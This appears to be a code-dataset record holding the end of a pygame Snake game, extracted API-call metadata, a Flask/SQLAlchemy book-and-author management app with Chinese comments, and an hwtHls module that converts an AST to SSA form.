            # SPACE after the ending starts a new, bigger game.
            if event.key == pygame.K_SPACE and game.is_ended():
                del game
                args.map_size += 1
                game = Game(args.map_size, args.maze, args.video_ending,
                            surface)
                continue
            # Arrow keys translate to grid deltas.
            if event.key == pygame.K_LEFT:
                direction = (-1, 0)
            elif event.key == pygame.K_RIGHT:
                direction = (1, 0)
            elif event.key == pygame.K_UP:
                direction = (0, -1)
            elif event.key == pygame.K_DOWN:
                direction = (0, 1)
        game.update(direction)
    pygame.quit()


if __name__ == '__main__':
    main()
| [
"pygame.init",
"pygame.quit",
"pygame.key.get_mods",
"pygame.mixer.music.set_volume",
"argparse.ArgumentParser",
"pygame.display.set_mode",
"pygame.display.flip",
"subprocess.Popen",
"maze_map.MazeMap",
"pygame.image.load",
"pygame.mixer.music.load",
"pygame.Rect",
"glob.glob",
"random.cho... | [((229, 255), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (245, 255), False, 'import os\n'), ((8055, 8099), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Snake"""'}), "(description='Snake')\n", (8078, 8099), False, 'import argparse\n'), ((8313, 8326), 'pygame.init', 'pygame.init', ([], {}), '()\n', (8324, 8326), False, 'import pygame\n'), ((8331, 8366), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Snake"""'], {}), "('Snake')\n", (8357, 8366), False, 'import pygame\n'), ((8371, 8402), 'pygame.mouse.set_visible', 'pygame.mouse.set_visible', (['(False)'], {}), '(False)\n', (8395, 8402), False, 'import pygame\n'), ((8417, 8467), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(0, 0)', 'pygame.FULLSCREEN'], {}), '((0, 0), pygame.FULLSCREEN)\n', (8440, 8467), False, 'import pygame\n'), ((9458, 9471), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (9469, 9471), False, 'import pygame\n'), ((486, 528), 'maze_map.MazeMap', 'maze_map.MazeMap', (['map_size', 'map_size', 'maze'], {}), '(map_size, map_size, maze)\n', (502, 528), False, 'import maze_map\n'), ((1337, 1367), 'random.choice', 'random.choice', (['self._food_imgs'], {}), '(self._food_imgs)\n', (1350, 1367), False, 'import random\n'), ((1577, 1615), 'glob.glob', 'glob.glob', (["(SELF_DIR + '/bgmusic/*.mp3')"], {}), "(SELF_DIR + '/bgmusic/*.mp3')\n", (1586, 1615), False, 'import glob\n'), ((1662, 1700), 'random.shuffle', 'random.shuffle', (['self._background_songs'], {}), '(self._background_songs)\n', (1676, 1700), False, 'import random\n'), ((2236, 2275), 'glob.glob', 'glob.glob', (["(SELF_DIR + '/food_img/*.png')"], {}), "(SELF_DIR + '/food_img/*.png')\n", (2245, 2275), False, 'import glob\n'), ((7943, 7964), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (7962, 7964), False, 'import pygame\n'), ((8571, 8590), 'pygame.event.wait', 'pygame.event.wait', ([], {}), '()\n', (8588, 8590), False, 
'import pygame\n'), ((2678, 2721), 'pygame.image.load', 'pygame.image.load', (["(SELF_DIR + '/ending.png')"], {}), "(SELF_DIR + '/ending.png')\n", (2695, 2721), False, 'import pygame\n'), ((2823, 2872), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (["(SELF_DIR + '/ending.mp3')"], {}), "(SELF_DIR + '/ending.mp3')\n", (2846, 2872), False, 'import pygame\n'), ((2885, 2919), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (['(1.0)'], {}), '(1.0)\n', (2914, 2919), False, 'import pygame\n'), ((2932, 2959), 'pygame.mixer.music.play', 'pygame.mixer.music.play', (['(-1)'], {}), '(-1)\n', (2955, 2959), False, 'import pygame\n'), ((2986, 3036), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['self._background_songs[0]'], {}), '(self._background_songs[0])\n', (3009, 3036), False, 'import pygame\n'), ((3049, 3083), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (['(0.4)'], {}), '(0.4)\n', (3078, 3083), False, 'import pygame\n'), ((3096, 3123), 'pygame.mixer.music.play', 'pygame.mixer.music.play', (['(-1)'], {}), '(-1)\n', (3119, 3123), False, 'import pygame\n'), ((4487, 4508), 'pygame.Color', 'pygame.Color', (['(0)', '(0)', '(0)'], {}), '(0, 0, 0)\n', (4499, 4508), False, 'import pygame\n'), ((4821, 4845), 'pygame.Color', 'pygame.Color', (['(20)', '(20)', '(20)'], {}), '(20, 20, 20)\n', (4833, 4845), False, 'import pygame\n'), ((4871, 4898), 'pygame.Color', 'pygame.Color', (['(255)', '(255)', '(255)'], {}), '(255, 255, 255)\n', (4883, 4898), False, 'import pygame\n'), ((4924, 4951), 'pygame.Color', 'pygame.Color', (['(100)', '(255)', '(100)'], {}), '(100, 255, 100)\n', (4936, 4951), False, 'import pygame\n'), ((4977, 5002), 'pygame.Color', 'pygame.Color', (['(80)', '(160)', '(80)'], {}), '(80, 160, 80)\n', (4989, 5002), False, 'import pygame\n'), ((8732, 8753), 'pygame.key.get_mods', 'pygame.key.get_mods', ([], {}), '()\n', (8751, 8753), False, 'import pygame\n'), ((5230, 5289), 'pygame.Rect', 'pygame.Rect', (['(0)', '(0)', 
'progress_bar_length', 'PROGRESS_BAR_HEIGHT'], {}), '(0, 0, progress_bar_length, PROGRESS_BAR_HEIGHT)\n', (5241, 5289), False, 'import pygame\n'), ((5356, 5538), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'grid_color', '(self._left + x * self._grid_size, self._top)', '(self._left + x * self._grid_size, self._top + self._map_size * self._grid_size\n )'], {}), '(self._surface, grid_color, (self._left + x * self.\n _grid_size, self._top), (self._left + x * self._grid_size, self._top + \n self._map_size * self._grid_size))\n', (5372, 5538), False, 'import pygame\n'), ((5693, 5874), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'grid_color', '(self._left, self._top + y * self._grid_size)', '(self._left + self._map_size * self._grid_size, self._top + y * self._grid_size\n )'], {}), '(self._surface, grid_color, (self._left, self._top + y *\n self._grid_size), (self._left + self._map_size * self._grid_size, self.\n _top + y * self._grid_size))\n', (5709, 5874), False, 'import pygame\n'), ((7451, 7642), 'pygame.draw.circle', 'pygame.draw.circle', (['self._surface', 'color', '(self._left + pos[0] * self._grid_size + self._grid_size // 2 + 1, self.\n _top + pos[1] * self._grid_size + self._grid_size // 2 + 1)', 'radius'], {}), '(self._surface, color, (self._left + pos[0] * self.\n _grid_size + self._grid_size // 2 + 1, self._top + pos[1] * self.\n _grid_size + self._grid_size // 2 + 1), radius)\n', (7469, 7642), False, 'import pygame\n'), ((2439, 2466), 'pygame.image.load', 'pygame.image.load', (['img_file'], {}), '(img_file)\n', (2456, 2466), False, 'import pygame\n'), ((4288, 4318), 'random.choice', 'random.choice', (['self._food_imgs'], {}), '(self._food_imgs)\n', (4301, 4318), False, 'import random\n'), ((3933, 3958), 'pygame.mixer.music.stop', 'pygame.mixer.music.stop', ([], {}), '()\n', (3956, 3958), False, 'import pygame\n'), ((4004, 4061), 'subprocess.Popen', 'subprocess.Popen', (["['vlc', '-f', SELF_DIR + '/ending.mp4']"], {}), "(['vlc', 
'-f', SELF_DIR + '/ending.mp4'])\n", (4020, 4061), False, 'import subprocess\n'), ((6207, 6407), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'wall_color', '(self._left + x * self._grid_size, self._top + y * self._grid_size)', '(self._left + x * self._grid_size, self._top + (y + 1) * self._grid_size)', '(3)'], {}), '(self._surface, wall_color, (self._left + x * self.\n _grid_size, self._top + y * self._grid_size), (self._left + x * self.\n _grid_size, self._top + (y + 1) * self._grid_size), 3)\n', (6223, 6407), False, 'import pygame\n'), ((6782, 6981), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'wall_color', '(self._left + x * self._grid_size, self._top + y * self._grid_size)', '(self._left + (x + 1) * self._grid_size, self._top + y * self._grid_size)', '(3)'], {}), '(self._surface, wall_color, (self._left + x * self.\n _grid_size, self._top + y * self._grid_size), (self._left + (x + 1) *\n self._grid_size, self._top + y * self._grid_size), 3)\n', (6798, 6981), False, 'import pygame\n')] |
from flask import Flask, render_template, flash,request,redirect,url_for
from flask_sqlalchemy import SQLAlchemy
from flaskmodel.config import *
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)
# Create the Flask-SQLAlchemy database handle bound to the app.
# NOTE(review): db is created before SQLALCHEMY_DATABASE_URI is configured
# below; Flask-SQLAlchemy reads app.config lazily at first use, so this
# works, but confirm for the installed extension version.
db = SQLAlchemy(app)
'''
1. 配置数据库
a. 导入Sqlalchemy扩展
b. 创建db对象,并配置参数
c. 终端创建数据库
2. 添加书和作者模型
a. 继承db.Model
b. __tablename__:表名
c. 设置字段名
d. 设置引用关系
3. 添加数据
4. 使用模板显示数据库查询的数据
a. 在模板中for循环就行了(我自己试的时候想在py中做,但是没成功)
5. 使用WTF显示表单
a. 自定义表单类
b. 模板中显示
c. secret_key / 编码 / csrf_token的问题
6. 实现相关的增删逻辑
a. 增加数据
b. 删除书籍:网页中删除,点击需要发送数据的ID给删除书籍的路由,路由需要接收参数(for else / redirect / url_for 的使用)
c. 删除作者
'''
# Database connection URL, assembled from settings in flaskmodel.config.
app.config['SQLALCHEMY_DATABASE_URI'] = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
# Disable modification tracking (the change signal is not used here).
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# Secret key required by Flask-WTF CSRF protection and by flash().
app.secret_key = 'hbb'
# Custom WTForms form class for adding a book together with its author.
class AuthorForm(FlaskForm):
    # Both text fields are mandatory; the labels are user-facing (Chinese).
    author = StringField('作者',validators=[DataRequired()])
    book = StringField('书籍',validators=[DataRequired()])
    submit = SubmitField('提交')
# Author model: one author owns many books.
class Author(db.Model):
    # table name
    __tablename__ = 'authors'
    # columns
    id = db.Column(db.Integer,primary_key = True)
    author_name = db.Column(db.String(16),unique = True)
    # One-to-many relationship: author.books lists the Book rows and each
    # Book gains a backref attribute `author`.
    books = db.relationship('Book',backref='author')

    def __repr__ (self):
        # Debug-friendly representation showing the author's name.
        return '<Author: %r>' % self.author_name
# Book model: each book references exactly one author via author_id.
class Book(db.Model):
    __tablename__ = 'books'
    id = db.Column(db.Integer,primary_key=True)
    book_name = db.Column(db.String(255),unique=True)
    # Foreign key to authors.id (see Author.books relationship).
    author_id = db.Column(db.Integer, db.ForeignKey('authors.id'))

    def __repr__ (self):
        # Debug-friendly representation showing name and owning author id.
        return '<Book: %r %r>' % (self.book_name,self.author_id)
# Delete an author (remember to delete their books as well).
@app.route('/delete_author/<author_id>')
def delete_author(author_id):
    """Delete an author and every book they own, then redirect to the index."""
    author = Author.query.get(author_id)
    if author is None:
        flash('作者找不到')
        return redirect(url_for('index'))
    try:
        # Remove the author's books first so no orphan rows remain.
        Book.query.filter_by(author_id = author_id).delete()
        db.session.delete(author)
        db.session.commit()
    except Exception:
        flash('删除作者出错')
        db.session.rollback()
    return redirect(url_for('index'))
@app.route('/delete_book/<book_id>')
def delete_book(book_id):
    """Delete a single book by its id, then redirect back to the index."""
    book = Book.query.get(book_id)
    if book is None:
        flash('书籍找不到')
        return redirect(url_for('index'))
    try:
        db.session.delete(book)
        db.session.commit()
    except Exception:
        flash('删除书籍出错')
        db.session.rollback()
    return redirect(url_for('index'))
@app.route('/', methods=['GET', 'POST'])
def index():
    """Main page: list all authors with their books and handle the add form.

    Validation flow:
    1. Flask-WTF validates the submitted form (fields present, CSRF ok).
    2. On success read the author and book names.
    3. If the author exists and already has this book -> flash an error;
       otherwise attach the new book to the existing author.
    4. If the author does not exist but the book title does -> flash an
       error; otherwise create the author and then the book.
    5. A failed validation on POST flashes a "missing fields" message.
    """
    author_form = AuthorForm()
    if author_form.validate_on_submit():
        author_name = author_form.author.data
        book_name = author_form.book.data
        author = Author.query.filter_by(author_name=author_name).first()
        book = Book.query.filter_by(book_name=book_name).first()
        if author is not None:
            if book is not None:
                # Same book by the same author already stored.
                flash('已存在同名同作者书籍')
            else:
                try:
                    db.session.add(Book(book_name=book_name, author_id=author.id))
                    db.session.commit()
                except Exception as e:
                    print(e)
                    flash('有作者时添加书籍失败')
                    db.session.rollback()  # roll back the failed insert
        elif book is not None:
            # Book title already taken (by some other author).
            flash('已存在相同的书籍')
        else:
            try:
                # Create the author first so its id is available for the book.
                new_author = Author(author_name=author_name)
                db.session.add(new_author)
                db.session.commit()
                db.session.add(Book(book_name=book_name, author_id=new_author.id))
                db.session.commit()
            except Exception as e:
                print(e)
                flash('无作者时添加书籍失败')
                db.session.rollback()  # roll back the failed insert
    elif request.method == 'POST':
        flash('参数不全!')
    authors = Author.query.all()
    return render_template('books.html', authors=authors, form=author_form)
if __name__ == '__main__':
    # One-off schema/seed helpers; uncomment create_all() together with the
    # seed rows below to populate a fresh database, or drop_all() to reset.
    # db.create_all()
    # db.drop_all()
    # seed data
    # au1 = Author(author_name = 'hbb')
    # au2 = Author(author_name = 'ry')
    # au3 = Author(author_name = 'rmf')
    # db.session.add_all([au1,au2,au3])
    # db.session.commit()
    #
    # bk1 = Book(book_name = '量子史话',author_id = au1.id)
    # bk2 = Book(book_name = '我们仨',author_id = au1.id)
    # bk3 = Book(book_name = '管理学',author_id = au2.id)
    # bk4 = Book(book_name = '玩具的学与玩',author_id = au3.id)
    # bk5 = Book(book_name = '教养的迷思',author_id = au3.id)
    # db.session.add_all([bk1,bk2,bk3,bk4,bk5])
    # db.session.commit()
    # Development server only; do not use debug=True in production.
    app.run(debug=True)
| [
"flask.render_template",
"flask.flash",
"flask.Flask",
"wtforms.SubmitField",
"flask.url_for",
"flask_sqlalchemy.SQLAlchemy",
"wtforms.validators.DataRequired"
] | [((272, 287), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (277, 287), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((303, 318), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (313, 318), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((1133, 1150), 'wtforms.SubmitField', 'SubmitField', (['"""提交"""'], {}), "('提交')\n", (1144, 1150), False, 'from wtforms import StringField, SubmitField\n'), ((4623, 4687), 'flask.render_template', 'render_template', (['"""books.html"""'], {'authors': 'authors', 'form': 'author_form'}), "('books.html', authors=authors, form=author_form)\n", (4638, 4687), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2224, 2238), 'flask.flash', 'flash', (['"""作者找不到"""'], {}), "('作者找不到')\n", (2229, 2238), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2259, 2275), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (2266, 2275), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2582, 2596), 'flask.flash', 'flash', (['"""书籍找不到"""'], {}), "('书籍找不到')\n", (2587, 2596), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2617, 2633), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (2624, 2633), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((4563, 4577), 'flask.flash', 'flash', (['"""参数不全!"""'], {}), "('参数不全!')\n", (4568, 4577), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((1050, 1064), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1062, 1064), False, 'from wtforms.validators import DataRequired\n'), ((1107, 1121), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1119, 1121), False, 'from wtforms.validators import DataRequired\n'), ((2156, 
2171), 'flask.flash', 'flash', (['"""删除作者出错"""'], {}), "('删除作者出错')\n", (2161, 2171), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2514, 2529), 'flask.flash', 'flash', (['"""删除书籍出错"""'], {}), "('删除书籍出错')\n", (2519, 2529), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((3408, 3427), 'flask.flash', 'flash', (['"""已存在同名同作者书籍"""'], {}), "('已存在同名同作者书籍')\n", (3413, 3427), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((3935, 3952), 'flask.flash', 'flash', (['"""已存在相同的书籍"""'], {}), "('已存在相同的书籍')\n", (3940, 3952), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((3752, 3771), 'flask.flash', 'flash', (['"""有作者时添加书籍失败"""'], {}), "('有作者时添加书籍失败')\n", (3757, 3771), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((4429, 4448), 'flask.flash', 'flash', (['"""无作者时添加书籍失败"""'], {}), "('无作者时添加书籍失败')\n", (4434, 4448), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n')] |
from typing import Union, List, Optional, Tuple, Set
from hwt.hdl.operator import Operator
from hwt.hdl.operatorDefs import AllOps
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.statements.assignmentContainer import HdlAssignmentContainer
from hwt.hdl.statements.codeBlockContainer import HdlStmCodeBlockContainer
from hwt.hdl.statements.ifContainter import IfContainer
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal
from hwt.synthesizer.rtlLevel.signalUtils.exceptions import SignalDriverErr
from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, \
HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, \
HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak
from hwtHls.ssa.basicBlock import SsaBasicBlock
from hwtHls.ssa.context import SsaContext
from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch
from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater
from hwtHls.ssa.value import SsaValue
AnyStm = Union[HdlAssignmentContainer, HlsStreamProcStm]
class SsaInstrBranchUnreachable(SsaInstrBranch):
    """Branch terminator for an unreachable block: silently discards
    every jump target added to it."""

    def addTarget(self, cond:Optional[SsaValue], target:"SsaBasicBlock"):
        # Intentionally a no-op: control can never leave an unreachable block.
        pass
class SsaBasicBlockUnreachable(SsaBasicBlock):
    """Basic block used for code that can never execute (e.g. after a
    break/continue); its successor list ignores any added targets."""

    def __init__(self, ctx: SsaContext, label:str):
        SsaBasicBlock.__init__(self, ctx, label)
        # Replace the normal branch object so later addTarget calls are ignored.
        self.successors = SsaInstrBranchUnreachable(self)
class AstToSsa():
    """
    * <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. 2013.
      Simple and efficient construction of static single assignment form.
      In Proceedings of the 22nd international conference on Compiler Construction (CC'13).
      Springer-Verlag, <NAME>, 102–122. DOI:https://doi.org/10.1007/978-3-642-37051-9_6

    * avoids computation of dominance or iterated DF
    * works directly on AST (avoids CFG)

    :see: https://github.com/lohner/FormalSSA

    :note: new statements do generate a new block if this statement is not a loop the bloc is sealed.
        If statement is loop the first block is sealed once all jumps from loop end are resolved.
        Once the block is sealed the arguments for all phi functions is resolved recursively
        and redundant phis are reduced.

    :see: http://dev.stephendiehl.com/numpile/

    :ivar start: basic block where the program begins
    :ivar m_ssa_u: object which is used to track variable usage a to construct SsaPhi for SSA normal form
    :ivar _continue_target: list of basic blocks where code should jump on continue statement
    :ivar _break_target: list of basic blocks where code should jump on break statement
    :ivar _loop_stack: list of loop where the AST visitor actually is to resolve
        the continue/break and loop association. The record is a tuple (loop statement, entry block, list of blocks ending with break).
        The blocks ending with break will have its branch destination assigned after the loop is processed (in loop parsing fn.).
    """

    def __init__(self, ssaCtx: SsaContext, startBlockName:str, original_code_for_debug: Optional[HlsStreamProcCodeBlock]):
        self.ssaCtx = ssaCtx
        self.start = SsaBasicBlock(ssaCtx, startBlockName)
        self.m_ssa_u = MemorySSAUpdater(self._onBlockReduce, self.visit_expr)
        # all predecesors known (because this is an entry point)
        self._onAllPredecsKnown(self.start)
        self._continue_target: List[SsaBasicBlock] = []
        self._break_target: List[SsaBasicBlock] = []
        self.original_code_for_debug = original_code_for_debug
        self._loop_stack: List[Tuple[HlsStreamProcWhile, SsaBasicBlock, List[SsaBasicBlock]]] = []

    def _onBlockReduce(self, block: SsaBasicBlock, replacement: SsaBasicBlock):
        # Keep self.start pointing at a live block when the updater merges blocks.
        if block is self.start:
            self.start = replacement

    @staticmethod
    def _addNewTargetBb(predecessor: SsaBasicBlock, cond: Optional[RtlSignal], label: str, origin) -> SsaBasicBlock:
        """Create a new successor block of ``predecessor`` reached when ``cond`` holds."""
        new_block = SsaBasicBlock(predecessor.ctx, label)
        if origin is not None:
            new_block.origins.append(origin)
        predecessor.successors.addTarget(cond, new_block)
        return new_block

    def _onAllPredecsKnown(self, block: SsaBasicBlock):
        # Sealing resolves pending phi arguments once no more predecessors can appear.
        self.m_ssa_u.sealBlock(block)

    def visit_top_CodeBlock(self, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
        block = self.visit_CodeBlock(self.start, obj)
        self._onAllPredecsKnown(block)
        return block

    def visit_CodeBlock(self, block: SsaBasicBlock, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
        return self.visit_CodeBlock_list(block, obj.statements)

    def visit_CodeBlock_list(self, block: SsaBasicBlock, obj: List[AnyStm]) -> SsaBasicBlock:
        """Dispatch each statement to its visit_* handler, threading the current block."""
        for o in obj:
            if isinstance(o, HdlAssignmentContainer):
                block = self.visit_Assignment(block, o)
            elif isinstance(o, HlsStreamProcWrite):
                block = self.visit_Write(block, o)
            elif isinstance(o, HlsStreamProcWhile):
                block = self.visit_While(block, o)
            elif isinstance(o, HlsStreamProcFor):
                block = self.visit_For(block, o)
            elif isinstance(o, (HlsStreamProcIf, IfContainer)):
                block = self.visit_If(block, o)
            elif isinstance(o, HlsStreamProcRead):
                block, _ = self.visit_expr(block, o)
            elif isinstance(o, HlsStreamProcBreak):
                block = self.visit_Break(block, o)
            elif isinstance(o, HlsStreamProcContinue):
                # BUG FIX: this previously called self.visit_Coninue (typo),
                # which does not exist and raised AttributeError for every
                # `continue` statement; the handler is named visit_Continue.
                block = self.visit_Continue(block, o)
            else:
                raise NotImplementedError(o)

        return block

    def visit_expr(self, block: SsaBasicBlock, var: Union[RtlSignal, HValue]) -> Tuple[SsaBasicBlock, Union[SsaValue, HValue]]:
        """Translate an expression tree into SSA instructions appended to ``block``.

        :return: tuple (possibly new current block, SSA value/constant of the expression)
        """
        if isinstance(var, RtlSignal):
            try:
                op = var.singleDriver()
            except SignalDriverErr:
                op = None

            if op is None or not isinstance(op, Operator):
                if isinstance(op, HdlPortItem):
                    raise NotImplementedError(op)
                elif isinstance(op, HlsStreamProcRead):
                    if op.block is None:
                        block.appendInstruction(op)
                        # HlsStreamProcRead is a SsaValue and thus represents "variable"
                        self.m_ssa_u.writeVariable(var, (), block, op)
                    return block, op
                elif isinstance(op, (HlsStreamProcBreak, HlsStreamProcContinue)):
                    raise NotImplementedError()
                else:
                    return block, self.m_ssa_u.readVariable(var, block)

            if op.operator in (AllOps.BitsAsVec, AllOps.BitsAsUnsigned) and not var._dtype.signed:
                # skip implicit conversions
                assert len(op.operands) == 1
                return self.visit_expr(block, op.operands[0])

            ops = []
            for o in op.operands:
                block, _o = self.visit_expr(block, o)
                ops.append(_o)

            self.m_ssa_u.writeVariable(var, (), block, tuple(ops))
            var = SsaInstr(block.ctx, var._dtype, op.operator, ops, origin=var)
            block.appendInstruction(var)
            # we know for sure that this is in this block that is why we do not need to use readVariable
            return block, var

        elif isinstance(var, HValue):
            return block, var
        else:
            if isinstance(var, HlsStreamProcRead):
                if var.block is None:
                    block.appendInstruction(var)
                    # HlsStreamProcRead is a SsaValue and thus represents "variable"
                    self.m_ssa_u.writeVariable(var._sig, (), block, var)
                var = var._sig

            return block, self.m_ssa_u.readVariable(var, block)

    def visit_For(self, block: SsaBasicBlock, o: HlsStreamProcFor) -> SsaBasicBlock:
        # Desugar: for(init; cond; step) body  ==  init; while(cond) { body; step }
        block = self.visit_CodeBlock_list(block, o.init)
        return self.visit_While(block, HlsStreamProcWhile(o.parent, o.cond, o.body + o.step))

    def visit_While(self, block: SsaBasicBlock, o: HlsStreamProcWhile) -> SsaBasicBlock:
        if isinstance(o.cond, HValue):
            if o.cond:
                # while True
                cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
                self._loop_stack.append((o, cond_block, []))
                body_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_wh", o)
                self._onAllPredecsKnown(body_block)
                body_block = self.visit_CodeBlock_list(body_block, o.body)
                body_block.successors.addTarget(None, cond_block)
                self._onAllPredecsKnown(cond_block)
                _o, _, breaks = self._loop_stack.pop()
                assert _o is o, (_o, o, "Must be record of this loop")
                if breaks:
                    # the loop is left only through break statements
                    end_block = SsaBasicBlock(block.ctx, f"{block.label:s}_whEnd")
                    for b in breaks:
                        b: SsaBasicBlock
                        b.successors.addTarget(None, end_block)
                else:
                    # infinite loop without break: code after it can never run
                    end_block = SsaBasicBlockUnreachable(block.ctx, f"{block.label:s}_whUnreachable")
                self._onAllPredecsKnown(end_block)
            else:
                # while False: body never executes
                end_block = block
        else:
            # general while with a runtime condition
            cond_block_orig = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
            c = o.cond
            if c._dtype.bit_length() > 1:
                c = c != 0
            else:
                c = c._isOn()
            cond_block, c = self.visit_expr(cond_block_orig, c)
            cond_block.origins.append(o)
            self._loop_stack.append((o, cond_block, []))
            body_block = self._addNewTargetBb(cond_block, c, f"{block.label:s}_wh", o)
            self._onAllPredecsKnown(body_block)
            end_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_whE", o)
            body_block = self.visit_CodeBlock_list(body_block, o.body)
            body_block.successors.addTarget(None, cond_block)
            self._onAllPredecsKnown(cond_block_orig)
            _o, _, breaks = self._loop_stack.pop()
            assert _o is o, (_o, o, "Must be record of this loop")
            if breaks:
                for b in breaks:
                    b: SsaBasicBlock
                    b.successors.addTarget(None, end_block)
            self._onAllPredecsKnown(end_block)

        return end_block

    def visit_Continue(self, block: SsaBasicBlock, o: HlsStreamProcContinue) -> SsaBasicBlock:
        assert self._loop_stack, (o, "Must be in loop")
        _, loop_entry, _ = self._loop_stack[-1]
        block.successors.addTarget(None, loop_entry)
        return self._make_Unreachable(block.ctx, f"{block.label:s}_conUnreachable")

    def _make_Unreachable(self, ctx:SsaContext, label:str):
        # Code following break/continue can not execute; park it in a sink block.
        end_block = SsaBasicBlockUnreachable(ctx, label)
        self._onAllPredecsKnown(end_block)
        return end_block

    def visit_Break(self, block: SsaBasicBlock, o: HlsStreamProcBreak) -> SsaBasicBlock:
        # NOTE: annotation fixed from HlsStreamProcContinue to HlsStreamProcBreak
        # (annotation only, no behavioral change).
        assert self._loop_stack, (o, "Must be in loop")
        _, _, break_blocks = self._loop_stack[-1]
        # destination is filled in by visit_While once the loop end block exists
        break_blocks.append(block)
        return self._make_Unreachable(block.ctx, f"{block.label:s}_breUnreachable")

    def visit_If_branch(self, origin: IfContainer, label: str, cond_block: SsaBasicBlock,
                        end_if_block: SsaBasicBlock, cond: Optional[SsaValue], caseStatements: list):
        """Emit one branch of an if/elif/else and connect it to the join block."""
        if caseStatements:
            # new top block for the branch
            block = self._addNewTargetBb(cond_block, cond, label, origin)
            self._onAllPredecsKnown(block)
            # load body of the branch
            block = self.visit_CodeBlock_list(block, caseStatements)
            # add jump from the end of the branch to end of if-then-else
            block.successors.addTarget(None, end_if_block)
            # now nothing can jump on start or end of the branch, end_if_block will be only successor
        else:
            # empty branch: jump straight to the join block
            cond_block.successors.addTarget(cond, end_if_block)

    def visit_If(self, block: SsaBasicBlock, o: HlsStreamProcIf) -> SsaBasicBlock:
        cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_IfC", o)
        self._onAllPredecsKnown(cond_block)
        cond_block, cond = self.visit_expr(cond_block, o.cond)
        end_if_block = SsaBasicBlock(self.ssaCtx, f"{block.label:s}_IfE")

        self.visit_If_branch(o, f"{block.label:s}_If", cond_block, end_if_block, cond, o.ifTrue)
        for i, (c, stms) in enumerate(o.elIfs):
            cond_block, cond = self.visit_expr(cond_block, c)
            self.visit_If_branch(o, f"{block.label:s}_Elif{i:d}", cond_block, end_if_block, cond, stms)
        self.visit_If_branch(o, f"{block.label:s}_Else", cond_block, end_if_block, None, o.ifFalse)

        self._onAllPredecsKnown(end_if_block)
        return end_if_block

    def visit_Assignment(self, block: SsaBasicBlock, o: HdlAssignmentContainer) -> SsaBasicBlock:
        block, src = self.visit_expr(block, o.src)
        block.origins.append(o)
        # this may result in:
        # * store instruction
        # * just the registration of the varialbe for the symbol
        # * only a segment in bit vector can be assigned, this result in the assignment of the concatenation of previous and new value
        self.m_ssa_u.writeVariable(o.dst, o.indexes, block, src)
        return block

    def visit_Write(self, block: SsaBasicBlock, o: HlsStreamProcWrite) -> SsaBasicBlock:
        block, src = self.visit_expr(block, o.getSrc())
        o.operands = (src,)
        block.appendInstruction(o)
        block.origins.append(o)

        if isinstance(src, SsaValue):
            # register the write as a user of the SSA value
            src.users.append(o)
        return block

    def finalize(self):
        # Every phi must have been completed; leftovers mean an unsealed block.
        assert not self.m_ssa_u.incompletePhis, self.m_ssa_u.incompletePhis
| [
"hwtHls.ssa.basicBlock.SsaBasicBlock.__init__",
"hwtHls.ssa.basicBlock.SsaBasicBlock",
"hwtHls.ssa.instr.SsaInstr",
"hwtHls.hlsStreamProc.statements.HlsStreamProcWhile",
"hwtHls.ssa.translation.fromAst.memorySSAUpdater.MemorySSAUpdater"
